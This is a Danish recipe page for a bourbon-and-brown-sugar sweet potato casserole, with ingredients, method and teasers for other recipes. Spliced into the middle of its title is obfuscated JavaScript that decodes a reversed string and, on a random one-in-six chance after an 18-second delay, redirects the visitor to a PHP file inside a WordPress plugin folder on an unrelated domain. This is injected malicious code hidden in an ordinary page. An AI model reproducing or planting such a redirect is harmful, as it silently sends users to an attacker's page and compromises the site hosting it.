Sweet potato casserole with bourbon $nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and brown sugar

Søde kartofler stammer fra Sydamerika, og pilgrimmene så indianerne riste dem helt tilbage i 1500-tallet. Det er en af grundene til, at amerikanerne også i dag forbinder de søde kartofler med thanksgiving. Selv i de helt traditionelle opskrifter bliver de søde kartofler krydret med søde krydderier, og i denne opskrift for de også et kick fra whisky.

Opskrift til 8-10 pers.

8-10 søde kartofler, uskrællede og vaskede
200 g smør + lidt ekstra til at smøre formen
1 tsk kanel
½ tsk ingefær, stødt
¼ tsk muskat, revet
¼ tsk salt
200 g mørk muscovadosukker
2 dl bourbon whisky
150 g pekannødder, hakkede

Prik kartoflerne i skrællen med en gaffel, og bag dem i ovnen på en bageplade i 40 min. ved 190 grader, til de er møre. Lad dem køle af. Pil skallen af, og kom kødet i en skål. Tilsæt 50 g af smørret, og mos kartoflerne med smørret. Tilsæt kanel, ingefær, muskat og salt, og rør det hele godt sammen. Kom mosen i et smurt ovnfast fad (ca. 20 x 20 cm), og lav en fordybning i midten. Kom den resterende mængde smør, muscovadosukkeret og whisky i en kasserolle, og kog det sammen, til sukkeret og smørret er opløst. Hæld whisky-blandingen i fordybningen, og top med hakkede pekannødder. Bag mosen i ovnen i 30-40 min. ved 190 grader, til whiskysaucen bobler, og nødderne er gyldenbrune. Server mosen varm.

Trends

Populære artikler

Passioncake

Konditoren Nikolaos Strangas oplever, at mange vælger at spise sushi nytårsaften. Efter sådan et måltid er denne cremede kage med et syrligt pift af passionsfrugt

Læs mere

Syltede oliven og oste

Det er desværre de færreste, som kan få fat på helt friskhøstede oliven, så denne opskrift bruger forskellige slags oliven på glas, der vendes med

Læs mere

Macarons med kaffeganache

En af dessertkunstneren Nikolaos Strangas’ absolutte hitkager er macarons: Små franske makroner med fyld af fx mynte- eller jordbærganache. Det er lykkedes MAD&venner at lokke

Læs mere